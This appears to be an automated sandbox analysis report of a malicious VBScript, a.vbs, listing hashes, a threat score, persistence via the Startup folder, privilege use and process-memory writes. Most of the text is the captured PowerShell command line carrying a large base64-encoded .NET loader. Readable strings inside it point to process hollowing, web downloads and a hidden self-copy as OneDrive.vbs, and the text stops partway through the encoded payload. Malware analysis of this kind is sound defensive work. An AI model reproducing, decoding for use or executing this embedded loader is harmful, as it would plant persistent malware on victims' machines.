84bf179cf928c716bf6f7b0aad97772a56159abdc39e8ba8c4993cf5c45e457e

General

Target

a.vbs
Size

146KB
MD5

dbaafddd62e8880e074d25d56f1b8eeb
SHA1

74133271577329144562f9cdc50c8b1698b401b7
SHA256

84bf179cf928c716bf6f7b0aad97772a56159abdc39e8ba8c4993cf5c45e457e
SHA512

a63155cd4f85d30a304c2a908d0725246d276fd87ca46654409c2546513231de1ded7a04c26edcfca6481a5cda1ab37a6956a17beeb16e949dcd839a486b6a66
SSDEEP

1536:j89r/aDcWJwG0mtvR/Eg5dfT1Ph+9PEa6UJCw4GEMofk0i:Ktci

Score

7^/10

Malware Config

Signatures

Drops startup file 1 IoCs

Processes:

WScript.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.vbs WScript.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

844 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 844 powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.vbs	WScript.exe

pid	process
844	powershell.exe

description	pid	process
Token: SeDebugPrivilege	844	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 1476 wrote to memory of 844	1476	WScript.exe	powershell.exe
PID 1476 wrote to memory of 844	1476	WScript.exe	powershell.exe
PID 1476 wrote to memory of 844	1476	WScript.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a.vbs"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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+wBSA4AC+wBSA6AC+wBSA8AC+wBSA+AC+wBSAwAD+wBSAyAD+wBSAwAEEwBXAyAEEwBXA0AEEwBXA2AEEwBXA8AEEwBXAwAFEwBXAwEAAAAAAA4AAQAAAAAADwBsAXIBkwGcAaIBrAFMBFkECwASABkAIABFAE4AVQBkAMcARQEEASEA4AYBAAABIwB0BwEAAAElAG8HAQAAAScAigcBAAABKQCFBwEAAAErAMcHAQAAAS0A2QcBAAABLwC/BAIAAAExAJsHAQAAATMAigABAASAAAABAAAAAAAAAAAAAAAAADAFAAAKAAAAAAAAAAAAAAC2AWUAAAAAAAQAAAAAAAAAAAAAAL8BcgQAAAAABAAAAAAAAAAAAAAAvwFcAAAAAAAAAAAAAQAAAHoGAAAMAAQADQAEAA4ACAAPAAgAAAAQABoAWgAAABAASQBaAAAAAABLAFoAIwCnASMAsQEAAABBYDEAQ29udGV4dFZhbHVlYDEAVG9JbnQzMgBUb0ludDE2AGdldF9VVEY4AEEAQgBDAEQARQBWQUkAU3lzdGVtLklPAFFCWHRYAFByb2plY3REYXRhAGRhdGEAbXNjb3JsaWIATWljcm9zb2Z0LlZpc3VhbEJhc2ljAEdldFByb2Nlc3NCeUlkAFJlc3VtZVRocmVhZABTeW5jaHJvbml6ZWQAUmVwbGFjZQBDcmVhdGVJbnN0YW5jZQBBbmRlAEdldEhhc2hDb2RlAFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAEZpbGUAc2V0X1dpbmRvd1N0eWxlAFByb2Nlc3NXaW5kb3dTdHlsZQBzZXRfRmlsZU5hbWUASG9tZQBWYWx1ZVR5cGUAQXBwbGljYXRpb25CYXNlAEFwcGxpY2F0aW9uU2V0dGluZ3NCYXNlAFN0clJldmVyc2UARWRpdG9yQnJvd3NhYmxlU3RhdGUAR3VpZEF0dHJpYnV0ZQBFZGl0b3JCcm93c2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAFN0YW5kYXJkTW9kdWxlQXR0cmlidXRlAEhpZGVNb2R1bGVOYW1lQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAE9iZnVzY2F0aW9uQXR0cmlidXRlAE15R3JvdXBDb2xsZWN0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAWWFub0F0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAU3VwcHJlc3NVbm1hbmFnZWRDb2RlU2VjdXJpdHlBdHRyaWJ1dGUAQnl0ZQBnZXRfVmFsdWUAc2V0X1ZhbHVlAEdldE9iamVjdFZhbHVlAGdldF9TaXplAFNpemVPZgBOZXdMYXRlQmluZGluZwBzZXRfRW5jb2RpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5nAERvd25sb2FkU3RyaW5nAFRvU3RyaW5nAE9wdGljYWwATWFyc2hhbABNaWNyb3NvZnQuVmlzdWFsQmFzaWMuTXlTZXJ2aWNlcy5JbnRlcm5hbABTeXN0ZW0uQ29tcG9uZW50TW9kZWwATGF0ZUNhbGwAa2VybmVsMzIuZGxsAG50ZGxsLmRsbABGaWJlci5kbGwAS2lsbABTeXN0ZW0AQm9vbGVhbgBWZXJzaW9uAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAEludGVyYWN0aW9uAE50VW5tYXBWaWV3T2ZTZWN0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAEV4Y2VwdGlvbgBDdWx0dXJlSW5mbwBzZXRfU3RhcnRJbmZvAFByb2Nlc3NTdGFydEluZm8AWmVybwBTdGFydHVwAHN0YXJ0dXAARmliZXIAQnVmZmVyAFJlc291cmNlTWFuYWdlcgBVc2VyAEJpdENvbnZlcnRlcgBDb21wdXRlcgBDbGVhclByb2plY3RFcnJvcgBTZXRQcm9qZWN0RXJyb3IAQWN0aXZhdG9yAC5jdG9yAC5jY3RvcgBJbnRQdHIAU3lzdGVtLkRpYWdub3N0aWNzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5EZXZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5BcHBsaWNhdGlvblNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SZXNvdXJjZXMARmliZXIuUmVzb3VyY2VzLnJlc291cmNlcwBHZXRCeXRlcwBTdHJpbmdzAFJlZmVyZW5jZUVxdWFscwBUb29scwBDb252ZXJzaW9ucwBSdW50aW1lSGVscGVycwBPcGVyYXRvcnMAQ3JlYXRlUHJvY2VzcwBzZXRfQXJndW1lbnRzAEV4aXN0cwBDb25jYXQARm9ybWF0AENyZWF0ZU9iamVjdABDb25jYXRlbmF0ZU9iamVjdABMYXRlR2V0AFN5c3RlbS5OZXQATGF0ZVNldABXZWJDbGllbnQAU3RhcnQAQ29udmVydABTeXN0ZW0uVGV4dABXb3c2NEdldFRocmVhZENvbnRleHQAV293NjRTZXRUaHJlYWRDb250ZXh0AFZpcnR1YWxBbGxvY0V4AEFycmF5AGdldF9Bc3NlbWJseQBCbG9ja0NvcHkAUmVhZFByb2Nlc3NNZW1vcnkAV3JpdGVQcm9jZXNzTWVtb3J5AFN5c3RlbS5TZWN1cml0eQBJc051bGxPckVtcHR5AAAAAB9GAGkAYgBlAHIALgBSAGUAcwBvAHUAcgBjAGUAcwAAc0MAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAUgBlAGcAUwB2AGMAcwAuAGUAeABlAAALIgB7ADAAfQAiAAADIAAAOUMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwATwBuAGUARAByAGkAdgBlAC4AdgBiAHMAAHNDADoAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAdABlAG0AMwAyAFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIA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